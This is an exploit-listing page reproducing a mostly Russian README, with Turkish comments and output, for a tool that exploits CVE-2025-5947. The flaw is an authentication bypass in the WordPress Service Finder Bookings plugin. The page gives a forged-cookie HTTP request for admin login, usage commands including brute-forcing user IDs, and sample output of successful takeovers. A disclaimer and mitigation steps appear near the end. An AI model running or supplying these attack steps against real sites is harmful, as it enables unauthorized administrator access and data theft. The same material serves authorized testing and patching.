Sploitus

Exploit for CVE-2025-5947

kitploit · 2026-09-02

Exploit Code

MARKDOWN309 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-XXCONI-CVE-2025-5947
# CVE-2025-5947

Эксплойт CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0

# CVE-2025-5947 Exploit - Service Finder Bookings

![License](https://img.shields.io/badge/license-MIT-blue.svg) ![Python](https://img.shields.io/badge/python-3.6+-blue) ![Status](https://img.shields.io/badge/status-Active-brightgreen) ![CVSS](https://img.shields.io/badge/CVSS-9.8%20Critical-red)

> Инструмент эксплуатации уязвимости обхода аутентификации в плагине WordPress Service Finder Bookings ≤ 6.0

## 📋 Содержание

  * Об уязвимости
  * Технические детали
  * Установка
  * Использование
  * Примеры
  * Результаты
  * Безопасность
  * Ресурсы



## 🔴 Об уязвимости

### CVE-2025-5947

В плагине **Service Finder Bookings** для WordPress версии 6.0 и ранее обнаружена критическая уязвимость обхода аутентификации.

### 🎯 Воздействие

Неаутентифицированные злоумышленники могут:

  * ✅ Войти под видом любого пользователя
  * ✅ Получить доступ к учётным записям администраторов
  * ✅ Получить полный контроль над системой
  * ✅ Вызвать утечку данных
  * ✅ Загрузить вредоносный код



## 🔍 Технические детали

### Причина уязвимости

В функции `service_finder_switch_back()` наблюдается **недостаточная проверка cookie** :

root@kitploit:~
    
    
    // Güvenli olmayan kod
    if(isset($_COOKIE['original_user_id'])) {
        $user_id = $_COOKIE['original_user_id'];
        wp_set_current_user($user_id);
        // Doğrulama yok!
    }
    

### Вектор атаки

root@kitploit:~
    
    
    GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1
    Host: target.com
    Cookie: original_user_id=1
    

**Характеристики атаки:**

  * 🌐 Удалённый доступ (AV:N)
  * 🔓 Без аутентификации (PR:N)
  * 👤 Без взаимодействия с пользователем (UI:N)
  * 📊 Полное воздействие (C:H, I:H, A:H)



## 📦 Установка

### Требования

  * Python 3.6+
  * библиотека requests



### Шаг 1: Клонируйте репозиторий

root@kitploit:~
    
    
    git clone https://github.com/xxconi/CVE-2025-5947.git
    cd CVE-2025-5947
    

### Шаг 2: Установите зависимости

root@kitploit:~
    
    
    pip install -r requirements.txt
    

### Шаг 3: Запустите

root@kitploit:~
    
    
    python exploit.py -u http://target.com
    

## 🚀 Использование

### Основные команды

root@kitploit:~
    
    
    # Yardım göster
    python exploit.py -h
    
    # Admin (ID=1) olarak giriş dene
    python exploit.py -u http://target.com
    
    # Belirli kullanıcı ID'si ile
    python exploit.py -u http://target.com -i 5
    
    # Brute force (ID 1-10)
    python exploit.py -u http://target.com -b 1-10
    
    # SSL doğrulaması olmadan
    python exploit.py -u http://target.com --no-ssl-verify
    
    # Özel timeout ile
    python exploit.py -u http://target.com -t 30
    

### Параметры

## 💡 Примеры

### Пример 1: Простой эксплойт

root@kitploit:~
    
    
    python exploit.py -u http://wordpress.local
    

**Вывод:**

root@kitploit:~
    
    
    ============================================================
    CVE-2025-5947 Service Finder Bookings Exploit
    Authentication Bypass via Cookie Spoofing
    ============================================================
    ✅ Service Finder Bookings eklentisi bulundu
    
    🔍 Kullanıcı ID 1 ile giriş denemesi yapılıyor...
    📊 HTTP Status: 302
    📋 Response Headers:
       Location: http://wordpress.local/wp-admin/
       Set-Cookie: wordpress_logged_in_abc123=...
    
    ✅ BAŞARILI! Admin olarak giriş yapıldı!
    📍 Yönlendirme: http://wordpress.local/wp-admin/
    

### Пример 2: Перебор (Brute Force)

root@kitploit:~
    
    
    python exploit.py -u http://target.com -b 1-20
    

**Вывод:**

root@kitploit:~
    
    
    🔄 Brute Force Başlıyor (20 kullanıcı)...
    ✅ Kullanıcı ID 1: BAŞARILI
    ❌ Kullanıcı ID 2: Başarısız
    ✅ Kullanıcı ID 3: BAŞARILI
    ...
    ✅ Başarılı Kullanıcılar: [1, 3, 5]
    

### Пример 3: HTTPS без проверки SSL

root@kitploit:~
    
    
    python exploit.py -u https://target.com --no-ssl-verify
    

## 📊 Результаты

Успешный эксплойт характеризуется следующими признаками:

✅ Код ответа HTTP 301 или 302  
✅ Наличие `/wp-admin/` в заголовке `Location`  
✅ Наличие `wordpress_logged_in_` в заголовке `Set-Cookie`

## 🛡️ Безопасность

### ⚠️ Правовое предупреждение

**Этот инструмент предназначен исключительно для:**

  * ✅ Авторизованного тестирования безопасности
  * ✅ Использования на ваших собственных системах
  * ✅ Использования при наличии письменного разрешения



**Используйте только в этих целях. Автор не несёт ответственности.**

### 🔐 Способы защиты

  1. **Срочное обновление**

root@kitploit:~
         
         # WordPress admin panelinden güncelle
         # veya WP-CLI ile
         wp plugin update sf-booking
         

  2. **Отключение плагина**

root@kitploit:~
         
         wp plugin deactivate sf-booking
         

  3. **Удаление плагина**

root@kitploit:~
         
         wp plugin delete sf-booking
         

  4. **Web Application Firewall (WAF)**

root@kitploit:~
         
         Block: /wp-admin/admin-ajax.php?action=service_finder_switch_back
         

  5. **Проверка безопасности**

     * Проверьте учётные записи администраторов
     * Изучите журналы доступа
     * Проверьте, не было ли несанкционированного доступа



## 📚 Ресурсы

  * База данных Patchstack
  * GitHub Advisory
  * Детали NVD
  * Оригинальный эксплойт
  * Калькулятор CVSS



## 🤝 Внесение вклада

Чтобы сообщить об ошибках или предложить улучшения:

  1. Сделайте форк
  2. Создайте отдельную ветку (`git checkout -b feature/improvement`)
  3. Сделайте коммит (`git commit -am 'Add improvement'`)
  4. Запушьте изменения (`git push origin feature/improvement`)
  5. Откройте Pull Request



## 📄 Лицензия

Лицензия MIT — подробности см. в файле LICENSE

## 👤 Автор

**Исследователь безопасности**

  * GitHub: @yourusername



## 🙏 Благодарности

  * Patchstack Security Team
  * WordPress Security Community
  * CVE Coordinators



* * *

⭐ Если вам пригодилось, поставьте звезду!

🔝 Наверх